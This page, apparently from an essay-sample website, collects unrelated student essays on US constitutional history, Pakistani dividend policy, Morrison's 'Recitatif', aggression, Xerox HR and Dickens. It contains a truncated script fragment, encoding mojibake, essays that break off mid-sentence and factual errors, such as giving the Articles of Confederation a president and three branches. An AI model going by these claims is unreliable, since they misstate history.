Wednesday, July 31, 2019
Historical Foundations of the United States Constitution Essay
The United States Constitution is an extremely valuable document .The constitution assisted in creating our modern day United States; The constitution assisted in establishing our administration giving inhabitants privileges and liberty. The Constitution was put in place to give citizens a voice on how the country should be run and to establish laws and principles. There were five manuscripts that were very important in establishing the constitution, (A)The Magna Carta,1215 (B) The Mayflower Compact 1620, (c) The Declaration of Independence 1776, and (D) The Articles of confederation 1777 and (E) The Federalists Papers 1787-1788. The first document was the Magna Carta. The Magna Carta of 1215 was an English Contract whose sole reason was to create boundaries for administrative power. The significant charter was thought to be one of the most significant manuscripts in the founding of equality. The Magna Carta had a profound impact that is plainly observed in the government’s bill of rights and our Constitution. This charter believed that a person was not guilty until the evidence proved that they were guilty. The Magna Carta also stated that a person should have knowledge about the accusations that is placed on them; additional beliefs were people will have the entitlements to have the ruling of their peers prior to sentencing and the entitlements to have a lawyer speak on their behalf. The Magna Carta was written to make sure everyone had equal rights. The next on record was the Mayflower Compact of 1620. The Mayflower Compact was created and autographed on November 11, 1620. The Mayflower compact was created because when the settlers came to what was called the new world they did not have and guidelines or rules to go by the mayflower compact was put in place while awaiting legitimate administration was created. This record was the basis of the united .States Constitution, for the reason that it was the number one form of administration in the united .States .territory. The mayflower compact gave the settlers entitlements, but was governed by the king of England. This type of administration was short lived. The third document was the Declaration of Independence of 1776. This very important manuscript was created to detach the settlements from the country of England. The Declaration of Independence contained five sections the statement of human rights, charges against the ruler and assembly, the preamble, charges against human rights and the statement of separation and signatures. The Declaration of Independence gave the settlements self-government. The Declaration of Independence stated that the settlers had life, liberty and the pursuit of happiness and that all men were created equal. This is inscribed in the constitution. This is the foundation of our present day government. The fourth document is the Articles of Confederation of 1781. The settlements were now federations and they were approved. In the Articles of Confederation there are three branches of government, the judicial, the legislative and the executive branch. The judicial branch gives congress important responsibility to decide the form and construction of the federal judiciary. The Legislative branch contains the House of Representatives and the senate which shaped congress. The executive branch contains the president of the United States and performs as the head of state. Although the administration was just starting to work they were still frail. This caused the government to start over and re- created the Articles of Confederation which became our Constitution. The Articles of Confederation was a very important part of our constitution. The last document is the Federalists Papers of 1787-1788. These papers were created to encourage electorates to approve the constitution. There are about 85 papers that will clarify in part the way our latest administration should precede and the reason why the people should elect to have it. It was unsure who created the federalist Papers but it was believed that John Jay, Alexander Hamilton and James Madison provided the majority of the essays. In order to comprehend the constitution it is a good idea to read these essays first. In conclusion In order to learn how our United States Constitution was born it is a good idea to read these five documents. This will open a window on the reason why the constitution was created and how it was created. This will show how the modern day government was created. These documents did not have large parts in how the constitution became the constitution. If we did not have these individual documents are country may not have equality or we may not be able to voice our own opinions.
Determinants of Dividend Policy of Cement Industy of Pakistan
RESEARCH PROPOSAL DETERMINANTS OF DIVIDEND POLICY OF CEMENT INDUSTY OF PAKISTAN Submitted To: Dr. Ahmed Faisal Imtiaz Siddiqi Submitted By: Muhammad Waqar Akram ID # 12002096-010 Programme: MS-Finance Batch-02 INTRODUCTION Dividend Policy refers to the explicit or implicit decision of the Board of Directors regarding the amount of residual earnings (past or present) that should be distributed to the shareholders of the corporation This decision is considered a financing decision because the profits of the corporation are an important source of financing available to the firm.Dividend policy is a one of the most debated topics and a core theory of corporate finance which still keeps its prominent place. Many researchers presented various theories and uncountable empirical evidences, but the issue is still unresolved and open for further discussion. It is among top ten unresolved problems in the finance literature and we have not an adequate explanation for the observed dividend behavi or of the firms There are several reasons whether firms should pay dividends or not. The â€Å"dividend puzzle†why firms pay dividends and stock holders pay attention to dividends and still unresolved.Many hypotheses have been drawn to shed some light on this puzzle but the problem still exists. Normally a firm faces the problem of allocation of earnings, whether to distribute among shareholders or retaining for reinvestment and promote the firm growth. Retained earnings are a main internal source of financing, but higher retained earning mean fewer dividends and vice versa. The cement sector is a prominent sector of Pakistan and works as an engine of economic growth in the economy. It provides employment to a large number of people (directly & indirectly).Cement production capacity in Pakistan is 44 million tons annually while local demand is only 24 million tons, leaving a surplus of 20 million tons. Cement manufactured in Pakistan is being exported to Afghanistan and Cent ral Asian States below cost. During FY-11 cement industry exported over 4 million tons to these markets and the industry is optimistic that exports to Afghanistan and Central Asian States shall increase further since these countries are landlocked and Pakistan is the only country which is able to supply cement at competitive rates.So, it is important to find the factors that determine and affecting the dividend payout policy of this sector. LITERTURE REVIEW Over the past 50 years a great attention was given to determine the factors influencing dividend payout policy. A vast literature is available in this regard, however, the puzzle is still unresolved and open for further discussion. â€Å"Why do firms pay dividends? †further he raises a second question, â€Å"Why do investors pay attention to dividends? †although, the answers may appear clear, (Black 1998)but Black concludes that they are not.As we try to explain the fact, the more it seems like a puzzle, with piec es that just do not fit together. Various factors can be considered as the determinants of dividend payout policy and a number of logics for dividend payout policy have been declared in the literature, however, the researchers are not agreed on a single point. In developed economies, the decision whether paying dividends or keep as retained earnings has been taken very carefully by both investors and the management of the firm. (Adaoglu 2000) By paying a sufficient amount of dividend firms can prevent from the agency problem.The dividend payouts are helpful to keep firms in the market, where monitoring of managers is available at low cost. The managers make financial policy trade-offs to control agency cost in an effective way(Amidu and Abor 2006) A free cash flow is helpful for a firm to share it with stockholders as dividends and pay the debt in order to reduce the possibility of these funds being wasted on unprofitable projects(Pettit 1972) Firms’ investment policies have a significant impact on its dividend payout policy; the firms with less investment plans has greater amount to distribute as dividends.Due to the higher investment opportunities firms deprive from higher dividends to lower. So the investment opportunities has a negative relationship to the dividend payouts(Farinha 2003) Another factor affecting the dividend policy is the ownership of firm; state owned firms follow a smooth dividend pattern as compare to family owned firms. The family owned firms are uneager to pay dividends, whereas the state owned firms are more reluctant to diminish the dividend amount.The insider ownership also play a significant role in dividend policy(Imran 1997; Okpara 2010) The dividend policy is quite different in emerging markets as compare to developed economies, and seems to be affected by a number of factors(Al-Kuwari 2009) Due to several reasons like taxes pay procedure, stock market volatility and certain asymmetryinformation the dividend payout patter n is different in emerging markets as compare to developed nations.Another reason is that in emerging markets the firms focus on dividend payout ratios as compare to the level of dividends paid(Al-Kuwari 2009; Terra 2011) Higher the earnings of a firm, greater the size and firms with foreign ownership prefer to distribute a higher and constant amount in dividend payouts according to their earnings and size(Eriotis 2011) The liquidity of the firm leaves a negative impact on the firms dividend payout decision.The stock market liquidity and dividend are substitutes in the sight of investors, so the firm’s dividend policy is associated to the liquidity of its common stock. As a result firms with more liquid common stock, distribute less cash dividend(Amidu 2007) The more profitable firms are willing to distribute a higher amount of dividend payouts. The greater profitability not only positively affects the firms’ current dividend but dividend yield also. Whereas, the riski er firms distribute lower dividends and hence lower dividend yields.The firms which can easily fulfill their short term needs and want to improve their current payouts than last year are more willing to pay dividend(Fama and French 2002) OBJECTIVE †¢Companies pays dividend smoothly on regular basis †¢Dividend payout policy depend on size of firm †¢Profitability(Net Profit) of company effect dividend policy †¢Growing companies (Growth in sale) pays dividend on regular basis †¢Investment opportunity (Retained earnings) effect the dividend policy †¢Impact of liquidity (cash flows) on dividend policy †¢Impact of leverage (Debt to Equity ratio) on dividend policyTHEORITICAL FRAM WORK DATA COLLECTION & PROPOSED METHODOLOGY Investigates the factors determine the dividend payout policy of Pakistani cement companies listed on KSE. The data employed is derived from Balance Sheet Analysis of KSE listed companies published by companies, covered the ten year pe riod 2001 to 2010 of 26 companies. (companies depends upon availability of data) The nature of the data allows us the use regression analysis to build relationship between dividend payout policy and factors which influence dividend policy HYPOTHESISH1: Cement companies pays smooth or stable in paying dividend H2: Positive relationship of dividend payout and size(Total Assets) of company H3: Positive relationship between Profitability(Net Profit) of company & dividend payout H4: Positive relationship between growth(Growth in sale) and dividend payout H5: There is positive relationship between liquidity (Quick Ratio) & dividend payout. H6: There is negative relationship of leverage (Debt to Equity ratio) & dividend payments H7: There is negative relationship between Investment opportunity (retained earnings/total asset) and dividend payout Limitation Due to unavailability of all companies data listed on KSE to construct a balance panel and for selected time period, the study used data for twenty companies which represent more than 80 % of total cement industry. ?This study includes both types of firms (e. g. dividend paying and non paying firms). ?There are many determinants of dividend policy but only six determinates have been taken. References Adaoglu, C. (2000). â€Å"Instability in the dividend policy of the Istanbul Stock Exchange (ISE) corporations: evidence from an emerging market. Emerging Markets Review 1(3): 252-270. Al-Kuwari, D. (2009). â€Å"Determinants of the dividend policy in emerging stock exchanges: The case of GCC countries. †Global Economy & Finance Journal 2(2): 38-63. Amidu, M. (2007). â€Å"How does dividend policy affect performance of the firm on Ghana Tock exchange? †Investment Management and Financial Innovations 4(2): 103-112. Amidu, M. and J. Abor (2006). â€Å"Determinants of dividend payout ratios in Ghana. †Journal of Risk Finance, The 7(2): 136-145. Black, F. (1998). â€Å"The dividend puzzle. Streetwi se: the best of the Journal of portfolio management: 10. Eriotis, N. (2011). â€Å"The Effect Of Distributed Earnings And Size Of The Firm To Its Dividend Policy: Some Greek Data. †International Business & Economics Research Journal (IBER) 4(1). Fama, E. F. and K. R. French (2002). â€Å"Testing trade? off and pecking order predictions about dividends and debt. †Review of financial studies 15(1): 1-33. Farinha, J. (2003). â€Å"Dividend policy, corporate governance and the managerial entrenchment hypothesis: an empirical analysis. †Journal of Business Finance & Accounting 30(9? 0): 1173-1209. Imran, K. (1997). â€Å"Determinants of Dividend Payout Policy: A Case of Pakistan Engineering Sector. †Romanian Economic Journal 14(41): 47-60. Okpara, G. C. (2010). â€Å"Investigation of the critical sources of investment finance in Nigeria: a factor analytical approach. †Pettit, R. R. (1972). â€Å"Dividend announcements, security performance, and ca pital market efficiency. †The Journal of Finance 27(5): 993-1007. Terra, P. R. S. (2011). â€Å"Determinants of corporate debt maturity in Latin America. †European Business Review 23(1): 45-70.
Tuesday, July 30, 2019
Compare and Contrasts of “Recitatif†Essay
In â€Å"Recitatif†by Toni Morrison, two young girls Roberta and Twyla meet one another at a state home for orphan and foster children. It is apparent from the start that either of the girls is white or black. Even at their young age, they both have preconceived expectations of the other because of their difference in race. However, as each character ages and is developed further, many of their traits could be that of someone white or black, albeit they contrast in personality. As a result of these traits, readers will likely unconsciously try to racially classify Roberta and Twyla only to change their mind a minute later. â€Å"Recitatif†forces readers to abandon the preconceived stereotypes and realize that they are constantly creating racial conclusions that are primarily based on socially reinforced stereotypes. From the beginning of in the story, the narrator, Twyla, says things that are usually seen as racist and cultural insensitive statements. Twyla states that she became sick to her stomach when she is first introduced to Roberta. She says to the ‘Big Bozzo’ that â€Å"My mother won’t like you putting me in here [with Roberta]†(201). She continues on by quoting her mother saying â€Å"that they never washed their hair and they smelled funny. Roberta sure did. Smell funny, I mean†(201). As the story progresses, none of these thoughts reemerge from Twyla. However, there is still a great racial divide throughout the rest of the story. As for Roberta, aside from her mother refusing to shake Mary’s (Twyla’s mother) hand, not much is indicated about her knowledge about or feelings toward Twyla’s race until midway into the story. During the first reunion since St. Bonny’s, Roberta and her friends express obvious prejudice towards Twyla. The conversation begins to digress when Twyla is ridiculed in a very ugly manner for not knowing who Jimi Hendrix was. Roberta says â€Å"Jimi Hendrix, asshole. He’s only the biggest-Oh, wow. Forget it†(206) and dismissed Twyla during the rest of the short conversation. During the second encounter some years later, there is still an air of superiority indicated by the way she tries to justify her behavior during the previous encounter: â€Å"oh Twyla you know how it was in those days: blackâ€â€white. You know how everything was†(209). Even after it seemed that she had dealt with her racism, prejudice was still evident in their next when affirmative action required bussing for students in large cities. Roberta was upset and picketing against schools being forced to be integrated claiming it does not appeal to family values or the good of the children. Upon beginning the story, the assumption was that Roberta was black and that Twyla was white. However, as the story progressed, this theory in conjuction with certain scenes and events did not make sense. There were several times within the story which needed to be reevaluated, but the most interesting was the mother meeting and the bussing/integration issue. In story, Twyla portrays an image of Roberta’s mother as being tall and ample in stature wearing a large Christian cross. Twyla also notes that Roberta’s mom made a picnic out of her visit by bringing â€Å"chicken legs and ham sandwiches and oranges and a whole box of chocolate-covered grahams. Roberta drank milk from a thermos while her mother read the Bible to her†(204). One reading the story might automatically link this with the images of large black women preparing a large spread of food. One of the dishes, stereotypically, being chicken. However, this same woman denied Twyla’s mother the chance of shaking hands. A white woman would be more likely assumed as the one to refuse to shake a black person’s hand than the opposite. Then there is the issue of the school children being bussed to different schools, in order for the governments to achieve interracial schooling. The level of which Roberta was against the bussing of her children was strikingly high. Twyla saw nothing wrong and did not quite understand why the issue was seen as severe to the protestors. One would probably assume that a black mother may be more interested in interracial school for their children. White schools typically are seen as having better curriculum, better funding, and more qualified teachers. Also, one might assume that a white mother would be more prone to bigotry and to protest against the issue. Within all of this, there is the incident of protestors surrounding Twyla’s car and rocking it. In the story, Twyla suggests that the police do not rush to stop the protestors, â€Å"The four policemen who had been drinking Tab in their car finally got the message and strolled over†(211), or to disperse the conflict. It would be easy to assume that the policemen where white. The softness the policemen used to ask the women to move away from the car and return to the sidewalk and made no moves to clear the protest supports a view of white cops, with an unspoken agreement between them and the theme of the protest, asking white protestors to refrain from rocking a black women’s car. â€Å"Recitatif†addresses several problems in society without attaching a character to a specific issue. Toni Morrison shows racial stereotyping as a learned behavior as well as an incessant activity. The most admirable characteristic of this story is it does not draw a particular conclusion nor does it come to a clean resolution. The general framework of the story poses questions that incite the reader to reevaluate one’s opinion of the importance of race to them. The story causes one to try to see others as people and exercise empathy with a clean slate and no preconceived views, which plague our society to this day. Works Cited Morrison, Toni. â€Å"Recitatif.†The Norton Introduction to Literature. Ed. Kelly J. Mays. Shorter 11th ed. New York: Norton, 2013. 201-214. Print. View as multi-pages // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=††,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return ""},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Monday, July 29, 2019
Cont-wk 10 Essay Example | Topics and Well Written Essays - 750 words
Cont-wk 10 - Essay Example The biological perspective states that one of the monoamines, may be responsible for aggressive behavior. Specifically, the serotonin in the neural circuits is responsible for modulating aggression in animals, but in human behavior, serotonin activity can cause impulsive behavior and aggression (Weiten, 2001). The biological perspective can be compared to the behavioral perspective because it presents a reason why an individual may exhibit the behavior. Freud believed that aggressive behavior was normal and it was a way to relieve stress in order to get to catharsis. He defined catharsis as the "release of emotional tension" (Weiten, 2001, p. 539). However, other researchers have noted that aggressive behavior does not relieve stress; instead, it increases this behavior. Carol and Hodges (2006) studied aggressive boys and found that one contributing factor for aggression in boys was the fact that they tended have aggressive friends. Another interesting point that Carol and Hodges found was that when groups of aggressive boys get together, they may become aggressive towards specific victims. In looking at the reports about the Columbine High School shootings, the boys that were being bullied were considered misfits because they were not athletes. This would support the research of Carol and Hodges, especially if these children experienced aggressive behavior in their early adolescence. They suggested that if the relationship between the aggressors and the victims was studied more, there may be interventions that could be found early to stop the behavior before it starts. The psycho-social perspectives takes into consideration both the biological and behavioral perspectives. Newman and Fox (2009) researched aggression in the American high school and college settings between 2002 and 2008. They studied five factors that may influence whether children became aggressive enough to kill: 1) the shooters perception of themselves as being outside the
Sunday, July 28, 2019
Management Case Study of Xerox Essay Example | Topics and Well Written Essays - 1000 words
Management Case Study of Xerox - Essay Example Eventually, it will evaluate whether or not hiring and promoting women and minorities has been unfair to white men. Human resource professionals are at a good position to help in ensuring that top organizational leaders encourage managers and employees to follow laws and guidelines. They can do this through a number of ways. For instance, they may organize various trainings so as to teach top leaders on how to protect the profits of the organization, a step that may encourage the top leaders to abide by the laws, and go on to encourage other employees to do the same. In addition, the federal government supervises the recruitment of workers as well as the protection of their rights, especially if the workers happen to come from organizations that do business with the government. This prevents such organizations from manipulating the implementation of laws and guideline due to the fear of a contract cancellation that may reduce the organization’s profits. A clear understanding o f this motivates the leaders to introduce programs and policies that openly show such organizations are protecting the rights of all employees. Top leaders can also be involved in safety promotion campaigns within the work environments. Their priority should be to influence managers and employees, since workers who have safety in mind always look forward to abiding by safety laws when at work (Stuart, 2011). Human resource professionals can also establish monthly rendezvous with the top leaders concerning the laws and guidelines. They may use such opportunities to show the leaders the best ways of helping employees to abide to laws. Responsibilities attached to organizational legal matters should be taken seriously on a â€Å"daily basis,†and as such, the human resource professionals will use the meetings to sensitize organizational leaders on the seriousness of such responsibilities. It is after this that the leaders will pass such knowledge to not only their management sta ff but also other employees. Also, employees always tend to â€Å"follow their leaders.†Therefore, compliance to laws and guidelines can be encouraged more when organizational leaders also demonstrate a high sense of commitment to complying with the laws and guidelines. The leaders have to be committed to complying with laws that promote diversity and safety in the work place (Stuart, 2011). Organizational leaders also need to be made aware of the importance of not only effective communication but also awareness and training. Leaders need to effectively communicate the importance of not only safety but also diversity, to managerial staff and other employees. It can be done by making available awareness posters at the work environment, trainings on-line and conducting small â€Å"work-group seminars.†The human resource professionals should also encourage the organizational leaders to monitor as well as measure the â€Å"key results of the hiring process, to include h iring and recruiting minorities.†By keeping track of such things, it will be a pure proof that the organization complies with federal provisions. Leaders also need to found incentive programs for not only managers but also other junior employees. If the rates of accidents is relatively low and â€Å"no diversity issues are brought up†then the groups deserve to be rewarded for complying with the
Saturday, July 27, 2019
International Strategic Management Essay Example | Topics and Well Written Essays - 2500 words
International Strategic Management - Essay Example Today’s smart and customised phones are taking lead in the market. These tiny electronic gadgets perform multi-various functions added on with computer operating systems. These instruments can run various applications such as Twitter, games, guiding owners in shopping and dining and a host of other features. Mobile phones have such added functions as big displays, keyboards and internet availability. Old models of mobile phones are easier to operate than the new mobile phones (Yonkers, 2011). Some mobile phones have only selected features as per the needs of the customers. Our product the smart customized mobile phone caters to specific needs of the customers; they can be made to suit each customer’s individual preferences. Country Introduction (Philippines) Research indicates that in the ASEAN (Association of Southeast Asian Nations) region, an emerging global market, Philippines could be the ideal market for almost any product. The feel good factor is that Philippines is not against foreign direct investment in their country. It is the 19th largest export market of the United States with an approximate annual export of $8 billion. For launching a new product, the Philippines can be the perfect launching pad as people there have liking for the imported products. Language is not a barrier, as the Philippine is the third largest English speaking country (US Commercial Service, 2011). The Philippines market environment for the mobile phone products, called the Cellular Mobile Telephone System (CMTS) is quite encouraging. Let’s review different environmental aspects related to the Philippines economy, politics, legal, regulatory, technological, and social factors to ensure that the launching of our customised mobile phone would succeed in providing a secure international platform to our company. Market Environment in Philippines Our leading electronics product, the customised mobile phone would find a ready and ripe market as the mobile phone is a favourite digital device for the Filipinos. More than 22 million Filipinos have a mobile phone. The number of mobile subscribers is growing fast; in 2004 the growth rate touched to 34% to more than 30.2 million. In Short Messaging Service (SMS), this country is the world leader. As per the market report, carriers cover more than 1 billion text messages a day in Philippines. The above scenario regarding the mobile phone market and the Philippine’s 100 years old friendly business relations with the U.S. are enough to build up confidence of our company to enter in the Philippines market with its product launch, i.e. customised mobile phone (US Commercial Service, 2011). Industry Overview For providing a ready platform to our customised mobile phones, we need to develop an industry life cycle approach concurrent with the dynamic rationales for product strategy development, fit for Philippines. Ever-changing industry dynamics are impacted by such factors as the aggressive int ernational competition and the need to react fast to advances in technology affecting consumer preferences. As it happened in 2000s, the mobile phone industry saw a surge in demand because of innovation in the product and process of the product model. Surge in the demand for newer mobile phones is not going to dampen as sophistication in the produ
Friday, July 26, 2019
Financial markets and institutions Essay Example | Topics and Well Written Essays - 1500 words
Financial markets and institutions - Essay Example Any commodity market might be considered to be financial market if trader’s intention is not the immediate consumption of the commodity but as a means of delaying or accelerating consumption over time. Markets work by placing many interested sellers in one place, thus making them easier to find for potential buyers. An economy which relies primarily on connections between buyers and sellers to allot capital is known as a market economy. Financial markets are affected by forces of supply and demand, and allot capital over time through a price device such as the interest rate. Financial market could mean: organizations that facilitate the transaction in financial products, (for example, Stock exchanges facilitate the trade in stocks, bonds and warrants) and the coming together of buyers and sellers to trade financial products such as stocks and shares including: the use of stock exchanges; directly between buyers and sellers. There are different types of financial markets: capital market which provide finance through issuance of shares and bonds, commodity market which facilitate the trading of commodities, money market which arrange short term debt financing and investment, derivatives markets that provide instruments for the management of financial risk, insurance markets, which facilitate to cover of various risks and foreign exchange market which facilitate the trading of foreign exchange (Wikipedia, 2006). When looking at a financial institution it might seem to be a mediator between investors and customers. A financial institution might be considered as an agent that provides financial services for its customers. Financial institutions generally fall under financial rule from a government authority. The types of financial institutions include banks, building societies, credit unions, stock brokerages, and similar businesses. Financial institutions give service
Thursday, July 25, 2019
Referring to at least two of Ted Hughes' poems, discuss how the poet Essay
Referring to at least two of Ted Hughes' poems, discuss how the poet makes use of the natural landscape - Essay Example Ted Hughes nature poems include Wind, Rain, October Dawn and November. Wind is a wholly descriptive poem. It describes a storm .The description and the fierce mood nature is beautifully recorded in it. The portrayal of a tremendous dramatic picture of a landscape severely affected by weather is fully packed with imagery. The poem begins with a kind of metaphor It Seems to the poet that The house in which he is sitting at this time had been out at sea all night. He has this feeling because all night a storm had been raging. It seemed to the inmates that the house was being buffeted on the sea by the raging wind and waves. According to Alan Bold this poem takes as its physical starting point the house of Hughes parent’s. Hughes descries that house as some fine green goblet†The poem is full of magnificently arranged physical images which transform the so-called ordinary objects into objects of wonder. The comparison of te house to a ship is beautiful. â€Å"The house has been far out at sea all night. ... The difficulty in moving against the wind is also created by saying â€Å" I scaled along the house –side†¦..The landscape containing hills suddenly changing to a tend during the dreadful storm ,the magpie which was flung away etc gives the moving landscape instead of the stillness in some other poems. Wind is a not a tough poem to a reader who had some personal experience with of a furious storm Hughes was writing what he experienced during his stay there. On the subject of the poem Hughes himself said†On and off I live in the house on top of a hill in the penniness where the wind blows without obstruction across the top of the moors . I have experienced some gale in that house and wind is a poem I once wrote about them. In writing that poem I was mainly concerned with the strength of the blast, the way it seems to shake the world up like a box of toys†. ‘The rain’ is another notable poem of Ted Hughes in which we get a powerful display of a la ndscape affected by rain. This poem beautifully sketches the graphic visionary images of the rain. It has been raining. The rain brought floods and then came frost. After the frost there was more rain. Thus we get different pictures in quick succession. The opening line contains picture if rain floods frost, roof drumming, the purple bare woods heaved water and sleet. Then follow pictures of the fields, the hedge, the hill a, farm toads cows, a pheasant soaked thickets and so on. Through this long series of pictures the landscape affected by the rain closely viewed by the readers. The keen observer or perceiver in the poet Ted Hughes is most active in this poem Crab Robinson says that Hughes takes microscopic visual close
Religion and Theology Essay Example | Topics and Well Written Essays - 2000 words
Religion and Theology - Essay Example From this research it is clear that one of the important aspects is to create a rapport with the needy person to enable them to open up. A pastoral care worker can only provide a remedy, if they have a perfect understanding of the problems or the pain the needy person is experiencing. A pastoral care provider must seek to know vital information regarding the problem the needy person is facing. This according to my inductors can only be achieved if the pastoral care worker creates an appropriate environment in which the needy person will cooperate exemplary. The success of pastoral care will rest hugely on the skills of the pastoral worker’s skills in manoeuvring different situations.This study outlines that pastoral care is therefore as structured process, which requires the pastoral workers to employ their skills and Christian teachings to resolve the different situations. From my field experience, tutoring is an imperative stage, which provides the workers with initial skills to help them navigate some of the problems that may hinder the success of this form of counselling or care. Irrespective of the setting of the pastoral care, induction into the imperative aspects of practise is essential for any new pastoral worker. For one to receive pastoral care, he/she must come to the church and register. This is the system the church has established to enable proper management of the program. In addition, the church leadership may also identify people who they feel need pastoral care despite not being members of the church.
Wednesday, July 24, 2019
A Research on Jamaica Queens Paper Example | Topics and Well Written Essays - 4250 words
A on Jamaica Queens - Research Paper Example 0 3 9 7 29 36 16 100 109th Precinct 6 18 234 252 546 895 313 2,264 110th Precinct 4 45 397 225 436 741 167 2,015 111th Precinct 1 8 80 52 321 392 156 1,010 112th Precinct 3 6 116 50 267 595 167 1,204 114th Precinct 5 19 318 303 447 931 336 2,359 115th Precinct 5 36 345 261 407 629 273 1,956 Queens North 29 159 1,992 1,433 3,209 5,114 2,037 13,973 iii) Education: a) Public Elementary Schools: Jamaica's public schools, a branch of municipal government in New York City are operated by the New York City Department of Education under the New York City School Chancellor; Joel I. Klein, appointed by Mayor Michel Bloomberg in 2002. Public Elementary Schools in Jamaica include: P.S. 50 Talfourd Lawn Elemenatry School P.S. 86 P.S. 131 Abigal Adams Elementary School P.S. 160 P.S. 182 Samantha Smith b) Private Schools: Private schools in Jamaica include Archbishop Molloy High School The Mary Louis Academy, a private, Catholic, girls' high school run by the Sister of St. Joseph. Immaculate Conception School, a co-ed Catholic school from Pre-K to 8th grade. The school is a local landmark located on the property of Immaculate Conception Church and Monastery, run by The Passionist Congregation of Priests. c) Libraries: The Queens Borough Public Library, established in 1858, operates the Central Library in Jamaica and both the branches i.e. the Baisley Park Branch and the South Jamaica Branch are also located in Jamaica. It is considered as the No. 1 library system in the United States by circulation comprising 63 branches and having loaned 21 million items in the 2007 fiscal year. It also serves the population of more than 2.2 million, including the migrants who come down to refer this library which embraces large...Klein, appointed by Mayor Michel Bloomberg in 2002. Immaculate Conception School, a co-ed Catholic school from Pre-K to 8th grade. The school is a local landmark located on the property of Immaculate Conception Church and Monastery, run by The Passionist Congregation of Priests. The Queens Borough Public Library, established in 1858, operates the Central Library in Jamaica and both the branches i.e. the Baisley Park Branch and the South Jamaica Branch are also located in Jamaica. It is considered as the No. 1 library system in the United States by circulation comprising 63 branches and having loaned 21 million items in the 2007 fiscal year. It also serves the population of more than 2.2 million, including the migrants who come down to refer this library which embraces large percentage of non-English language books, particularly Spanish ones. It is governed by a 19-member Board of Trustees, which are appointed by the Mayor of the New York City and Borough President of Queens. The latter along with the Public advocate sit on the board as ex-officio members. The current director of the Queens Library is Thomas Galante. York College, a Senior College under the city of New York located in the borough of Queens after its set up in 1966. It was the first college funded under the newly formed City Union of New York. Now, more than 6,000 students in more than 40 bachelor's degree subjects are studying there. St John's University (Queens
Tuesday, July 23, 2019
Wl-Mrt Expnsion to Chinese mrket Assignment Example | Topics and Well Written Essays - 3500 words
Wl-Mrt Expnsion to Chinese mrket - Assignment Example The choice of the mrket entry will depend on mny fctors such s politicl, economic, technologicl, nd socio-culturl. With this in mind, the reserch discusses ech of those fctors while conducting PEST nlysis. Expnsion to Chin is gret opportunity for Wl-Mrt to gin profits nd dditionl mrket shre on the world mrket of retil. Opertion in Chin brings $1 billion in sles nnully. It is through Wl-Mrt Chin's 46 stores tht result in 450,000 trnsctions dy tht such high profit is possible (Hoopes, 2006). Expnsion into Chin is n opportunity tht Wl-Mrt cn not fford to miss. Chinese mrket is one of the biggest in the world nd the need to expnd beyond its 46 stores is logicl strtegic step the Wl-Mrt should undertke. Strong competition with Crrefour, the biggest retil in Frnce nd second biggest retil store in the world, is thret for the compny to stop being the first on the mrket. The need to expnd to Chin is wy to sty the leder in the world mrket s it hs been for long time of the retil store history. Wl-Mrt is excited bout Chin becuse it considers the size of the economy of this country, t the consistent growth over 20 yers, nd t the increse in individul nd fmily income nd spending power. s Beth Keck, Wl-Mrt director of interntionl corporte ffirs, sid in n interview. "In the lst 10 yers, you've seen the development of [forml] retil. So it's gret opportunity" (Nelson, 2006). By contrst to the second lrgest supermrket in the world, Crrefour, Wl-Mrt is Chin's 19th-lrgest retiler. Wl-Mrt Chin's SuperCenters lg their U.S. counterprts in revenues, generting on verge $35 million nnully, compred with $80 million to $120 million in the U.S. So there re lot of opportunities to expnd to Chinese mrket, more of which will be discussed lter in this pper long with mrketing nlysis of the compny (Hoopes, 2006). II. SWOT nlysis This nlysis is wy of looking t the Wl-Mrt s business, where the strengths nd weknesses of the orgnistion cn be contrsted with the threts nd opportunities of the outside business environment. The identifiction of the mjority of the SWOT fctors re intended to be derived through the erlier use of PEST nlysis s prt of the overll situtionl nlysis process. Tble1 SWOT nlysis Internl Strengths Weknesses Good loction of stores Trined stuff to operte the stores Estimted rise of revenues Chep lbor costs on Chinese mrket Good service nd employee pckge Very low number of trnsctions on the comprtively lrge territory Shky infrstructure in mny plces Development of rods, wter nd sewge brely keeps up in cities exploding with growth. Externl Opportunities Threts Further expnsion into Chinese mrket Possibilities of high benefits from Chinese mrket Mintining the growth on Chinese mrket Intensive competition from Frnce's Crrefour Competition from locl supermrkets Gtrengths Good loction of stores Wal-Mart China has a very good location t 12 Fenghung Rod which is in the hert of Shenzhen, Chin. Here people come just for a walk, a meeting at the corner restaurant or to see a movie in the cinema located not far. In this neighborhood of high-rise prtments, most customers rrive on foot or by bicycle. bout 12,000 shoppers visit this SuperCenter ech dy,
Monday, July 22, 2019
What Criticisms of 19th Century Life Is Dickens Making in the Novel Great Expectations Essay Example for Free
What Criticisms of 19th Century Life Is Dickens Making in the Novel Great Expectations Essay Charles Dickens wrote the novel Great Expectations in 1861. He originally wrote it as weekly instalments for a magazine called ‘All the year round. ’ In the novel he criticised many things about 19th century life, for example, the importance of being a gentleman and social status, crime and punishment, childhood and last but not least the role of women. Charles Dickens was born on 7th February, 1812, and spent the first nine years of his life living in the coastal regions of Kent. Dickens’s father, John, was a kind and likable man, but he was hopeless with money and piled up tremendous debts throughout his life. When Dickens was nine, his family moved to London and when he was twelve, his father was arrested and taken to prison for unpaid debts. Dickens’s mother moved his seven brothers and sisters into prison with their father, but she arranged for the young Dickens to live alone outside the prison and work with other children pasting labels on bottles in a blacking warehouse. Dickens found the three months he spent apart from his family highly traumatic. Not only was the job itself miserable, but he considered himself too good for it, earning the contempt of the other children. After his father was released from prison, Dickens returned to school. He eventually became a law clerk, then a court reporter, and finally a novelist. Many of the events from Dickens’s early life are mirrored in Great Expectations, which, apart from David Copperfield, is his most autobiographical novel. Pip, the novel’s hero lives in the marsh country, works at a job he hates, considers himself too good for his surroundings, and experiences material success in London at a very early age, exactly as Dickens himself did. In addition, one of the novel’s most appealing characters, Wemmick, is a law clerk, and the law, justice, and the courts are all important components of the story. In Victorian society, a gentleman was a person of upper or middle class. Usually, one was born into being a part of the gentry as it was almost impossible to move up the social hierarchy. Being a part of this elite sector of the class system is what Dickens explores and in doing so exploits the ambiguity of the term ‘gentleman’ and the complications as to what makes a man become gentleman. One of the major criticisms of 19th century life in the novel is the need to distinguish between social prestige and moral worth. Dickens explores this theme by questioning ideas about the nature of a gentleman. Pip is central to this theme, as he represents the link between the social classes. He is the village boy who becomes a gentleman with the help of a criminal. However, the 